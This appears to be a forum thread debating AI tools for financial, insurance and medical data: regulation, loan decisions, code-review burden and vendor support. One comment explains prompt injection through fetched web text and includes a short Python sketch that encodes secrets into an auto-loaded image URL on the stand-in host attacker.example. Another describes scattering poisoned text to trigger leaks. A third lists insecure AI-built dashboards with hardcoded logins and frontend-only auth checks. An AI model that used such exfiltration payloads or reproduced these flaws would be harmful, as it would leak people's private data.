I don't trust these AI-only companies to be overnight experts in properly handling medical, financial and insurance data. They have no business providing these tools, unless they want to take all the risk too.

I think a lot of people are misunderstanding the typical workload of people in financial services. They aren't using Claude to transfer money, they're just building a LOT of slideshows and fancy Excel docs on made-up numbers to try to sell mergers and new financing options/types of loans. Most programmers would just consider this "sales".

> made-up numbers

It's important to note that in most jurisdictions you can't actually do this legally. You may be able to get away with it, but it is actually illegal to sell financial services by misrepresentation.

You can say anything you want in forward looking statements in the US, within reason.

"They will have $1B in revenue by year end" is perfectly fine to completely make up.

there's a lot of domain knowledge in some of those areas.

that domain knowledge is acquired by talking to people - which AI can't do - all kinds of people, since the knowledge isn't written down.

I know this from having dated a girl who did M&A deals for media properties - you know, your big TV shows/movies, etc.

That’s a gross overgeneralization. Some of the insurance data here suggests use of AI to make underwriting decisions. There are several states with regulations that could potentially pull these agent solutions into their regulatory oversight if used by the industry to effect insurance outcomes.

The Odd Lots podcast had an interesting snippet about a financial institution that uses AI to make loan decisions. The guest said that they only use it on applicants who were rejected in the traditional sequence, and then use AI to accept them if possible. That way there's an articulable reason for a rejection, but they use the non-deterministic AI to allow an extra person through - since the laws about loans are mostly around not discriminating against people, companies are (generally) welcome to accept whoever.

That's dependent on the credit laws of the country in question, though. In Australia it cuts both ways: you cannot unreasonably discriminate (e.g. by race, gender, etc.), but at the same time you are forbidden from issuing credit to applicants who cannot meet the affordability requirements of said credit. Issuing a loan to a customer who provably cannot afford it is a breach of the NCC, and the company is held responsible for this. As a credit provider you must make reasonable enquiries into a customer's financial position; failing to do this is a breach. You must also be able to explain and justify the decision to issue credit if challenged by the civil regulator (AFCA, who are granted significant power in addressing this) on the basis of a customer complaint, and they most certainly do not accept "human said no but the computer then said yes" without hard facts such as proven positive income flow (pay slips, bank statements), known expenses, liabilities and reliable credit history.

> They aren't using Claude to transfer money, they're just [...]

It might be lower stakes, but isn't that still a juicy target for data-exfiltration attacks?

In other words, imagine if one of your direct competitors was watching everything your employee read while making spreadsheets and slideshows.

Yes, corporate espionage may be alive and real, but would Claude on their Microsoft/Amazon/Google cloud be different from documents on that same cloud?

Treating this as being about cloud-storage boundaries is, er, insufficiently paranoid.

Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.

Once that happens, exfiltration can be as simple as generating a spreadsheet/doc with a link or small auto-loaded image, and a URL that has data base64'ed into it.
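A minimal sketch of those mechanics (illustration only; `attacker.example` and the function name are hypothetical, not a real endpoint or API):

```python
import base64

# Illustration only: the mechanics of base64-in-a-URL exfiltration.
# "attacker.example" is a placeholder, not a real endpoint.
def exfil_image_markdown(secret: str) -> str:
    # URL-safe base64 keeps the payload a valid query-string value
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    # An auto-loaded image means the victim's renderer fires the request
    # as soon as the generated doc is displayed - no click required.
    return f"![chart](https://attacker.example/pixel.png?d={payload})"

print(exfil_image_markdown("confidential forecast"))
```

The point is that nothing here looks like code to the victim: it's just an image tag in a document the LLM "helpfully" produced.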

Or you could just get a hooker to sleep with one of them and plug a USB drive into their work laptops. I'm not trying to say there's nothing to worry about, but do you really think LLMs present that much larger an attack surface than exists now?

The work BIG-IP is doing on LLM traffic analysis is cool, though.

Stop thinking about hyper-targeted attacks (though those are a concern too) and consider indiscriminate ones.

1. It costs nothing to scatter poisonous data around that'll be infectious for ages

2. Running the exfiltrated-data endpoint is low-traffic and low-complexity

3. Even if it only affects a few targets you've probably recouped your investment.

The nature of LLMs also invites wide-net attacks. While one might tailor for specific models, victims could be anybody. You don't need to predict any idiosyncratic details like filenames; you can drop a phrase like "the most-confidential information that shouldn't be released publicly", and—thanks to the magic of LLM word association—you'll get a pretty good hit rate. Hallucinations are a problem, but the victims are hard at work attempting to minimize them already, and (since morals are already out the window) even plausible-but-false data could be used to sabotage reputations or threaten the same.

The only reason they are doing it is because there is regulation for people but not for machines.

This is objectively not true. You can’t get around HIPAA by saying “lol wasn’t me it was an Agent”

You can bet that someone out there is probably trying to build a startup right now based on that idea.

Yep. There's no certification needed to create a financial model or close monthly books.

HIPAA doesn't require any certification either. Some organizations voluntarily choose to earn certification from private companies that offer certifications for compliance with HIPAA privacy or administrative simplification rules, but this is completely optional.

[deleted]

For doing some reporting stuff internally, there isn’t a certification. But there are definitely humans who have to certify financial statements and communications for financial offerings.

Can't wait for Claude to submit fake tax records for me so that I can commit fraud legally.

This is my litmus test.

If AI is really as wondrous as everybody says, why didn't all the employees of all the AI companies simply type "Claude, file my taxes for me" as a prompt and walk away?

Because having to ask suggests that the AI didn't already do it for you pre-emptively.

If you're not yet waking up to AI completing tasks for you that you didn't directly ask for, you might be falling behind the curve. A good personal assistant does what you ask, a better personal assistant knows what you need before you do and has it completed before you reach your desk. AI is already starting to reach into the latter category.

(edit: dialled back some unnecessary snark.)

My experience has been quite the opposite. Some bank processes remain oral traditions about clicking excel filters by hand because any code would have to be extensively documented and tested.

I would recommend not using these if you are not willing to absorb the risk.

Luckily there is still a significant market for the services.

Some human always gets to be the certified fall guy for non-compliance. Maybe the legal agent can help structure the company so that it is an ignorant lower-level accountant and not the CFO.

Currently we don't know the risk, so it is kind of hard to absorb.

Decade-old spoilers for "How I Met Your Mother" ... but there's a character who has that kind of job, as a legal meat-shield.

https://www.youtube.com/watch?v=8u62HptZ6TE

> properly handling

Why, they can sell user data to other brokers. Experts indeed! But not in insurance or finance, of course.

Claude's actually pretty great at this! I used to use Claude a LOT to answer interesting questions (which I'll be writing up!). More generally, Claude is palpably different from most other agents. I'd recommend these models – especially Opus – without qualification.

But there's a process risk here based on their current practises. I'm hoping those practises change so that I can recommend Claude to everyone I know, but as of now, there's existential risk exposure here that's greater than Google's.

Anthropic's automated systems can and will ban you for pretty arbitrary things, and you won't get human support – or Claude – even if you are an enterprise paying through the nose. And there's zero redress unless you go viral on social media. Or know someone who knows someone. See: https://x.com/Whizz_ai/status/2051180043355967802 https://x.com/theo/status/2045618854932734260

And I say that as someone who likes how Anthropic has been training Claude and Opus. I just don't think they're prepared to be the trillion dollar company they've become. They are – in a very real way – suffering from success. Which is extremely inconvenient to be on the receiving end of when you're on a deadline.

Before AI, shipping code to production used to be a two-person task: one writes the code, another reviews it. Now, with AI writing the code, the developer who was supposed to write the code only has to review it. And this is because they are responsible for the code they ship.

Code review has become unbearable, because before AI, developers were reviewing code as they wrote it in the first place. Granted, that was never perfect, which is why a second person reviewing the code was (is?) a best practice. But effectively there was always some level of code review happening as developers wrote code.

I fear it is way more boring to review financial and medical documents written entirely by AI than it is to write (and simultaneously review) them yourself. And way more dangerous to ship mistakes than in most software.

> the developer who was supposed to write the code only has to review it.

But more often than not that developer ends up reviewing far more lines of code due to the typical verbosity of an LLM.

100%... that's why I say code review became unbearable!

I am/was writing up an interesting hypothesis with Claude's help. But I redid the most important parts of the data pipeline manually. As in, I went in and cmd-c + cmd-v'ed the data by hand to create a reference, and I'm randomly spot-checking 33% of the larger records.

The analysis itself; I'm doing it by hand.

Why not have the developer write the code, then the AI review it, and then finally get a signoff from another human?

Far too often people think productivity is the point. Maybe the point is that the developer's understanding of the product IS the product?

You're not engineering black boxes, you're engineering legible boxes.

> Far too often people think productivity is the point. Maybe the point is that the developer's understanding of the product IS the product?

This is an interesting take.

Isn’t there a code review agent?

Most workflows use a sub-agent to review the code, or an agent from a different company.

For example, Codex can review code written by Claude, etc.

/s?

Pretty great at what? I work in the insurance industry, specifically Medicare. All I see is sales people and other managers slopping out AI dashboards off of spreadsheets galore. Not only is it terrible for protecting PHI/PII, it also doesn't do things like RBAC very well. Now instead of preventing a person from externally sharing a file, I have to make sure they didn't egress the file to Supabase or some other platform.

Here are some of the horrible things I've seen. A frontend dashboard with PHI/PII deployed via Vercel/Next because AI told them how to get their site online. The login is hardcoded into the frontend, so anyone with inspect can find the password.

Another "fixed" dashboard deployed the same way. This time they added Firebase auth, so they got sign-in with Google, restricted to logins from our domain. Wait, how would they be able to create a token for our domain? They didn't: the frontend just blocks other domains from calling firebase.auth, but Firebase doesn't care. So simply calling the function in the console lets me log in with any Gmail account...

They were also showing me their RBAC with Firebase. Again, they don't have access to our Organization/Directory/Groups. So I wondered how they did this... wouldn't you guess, it's a hardcoded list of approved users. You can literally call firebase.auth and sign in anonymously. Again, only the frontend checks the email addresses. So now that I have Firebase auth, all the backend Firebase functions just check that you have auth'd. So I can make any request I want to the backend. The frontend simply won't show me the code.

I could go on and on about the stupidity levels I'm facing but I don't feel like crashing out.

All I can say is this tool is only useful if you already know how to correctly implement these things. Does it save me time? Sure, but I have to call out its mistakes and explain why not to do things. Honestly I feel like Claude is good for people who like to gamble: when it gets it right it feels great, but I don't want to roll the dice 30 times to get it correct.

[flagged]

> and you won't get human support – or Claude – even if you are an enterprise paying through the nose. And there's zero redress unless you go viral on social media.

Sadly this sounds like par for the course when it comes to tech. Too many messages and requests for help depend on knowing someone in the right Slack groups.

If you’re paying through the nose, you would have forward-deployed Anthropic/OpenAI engineers on the premises.

[deleted]

Which is very confusing to me. If you have groundbreaking AI, you can offer groundbreaking support at scale.

You wouldn't build a chatbot for that; imagine how easy it would be to make that thing go off the rails and allow anyone to reactivate their account. Really, you can't trust it to do any business function...

At least, that's really the message this sends in my opinion

I really wish more people would view these companies with the suspicion they deserve, as they sell the product as safe and comprehensive while refusing/failing to use it the same way themselves.

> If you have groundbreaking AI, you can offer groundbreaking support at scale

You're a funny one, aren't you...

Meet "Fin", Anthropic's "where support questions go to die" so-called support bot, built by Intercom but powered by Anthropic.

Maybe it's an internal in-joke in the Anthropic offices... "fin" in French means "end".

I don't know anyone who has had a positive experience with "Fin"... or ever spoken to a human at Anthropic support, for that matter, even if you ask "Fin" to escalate.

"Claude, please unban me"

Nope.

Customer support and safety are cost centers. It doesn’t scale like software does and no one’s KPIs are going to improve dramatically if you provide support beyond a point.

AI and LLMs are the cool tech, and the most important thing is to push the frontier. Money spent elsewhere is money not spent on R&D.

It would be hilarious if it wasn’t the GDPs of nations being spent on this.

They aren't even close to a $1T company; they're valued at <$400B, and that's at like a 20x-30x multiple. They can probably raise money at a higher valuation, but it's literally just value based on hype, not revenue.

Check the secondaries market ;-)

FOMO/hype, not revenue. Google's AI business is profitable, and its training-to-inference stack is vertically integrated. Their AI biz did not add $1T to their market cap, despite their much more advantageous position. A $1T valuation for Anthropic makes absolutely no sense.

It also makes no sense to me there are people qualified to participate in these secondary markets who are that stupid, but here we are.

I do know 2 people participating in secondaries, one of them explicitly with Anthropic shares: I would not consider any of them stupid :-)

And for participating there, there is no "qualification that allows you to enter"; it's other metrics.

If Anthropic's valuation makes no sense - fair enough - but why then is OpenAI's valuation of $850B correct?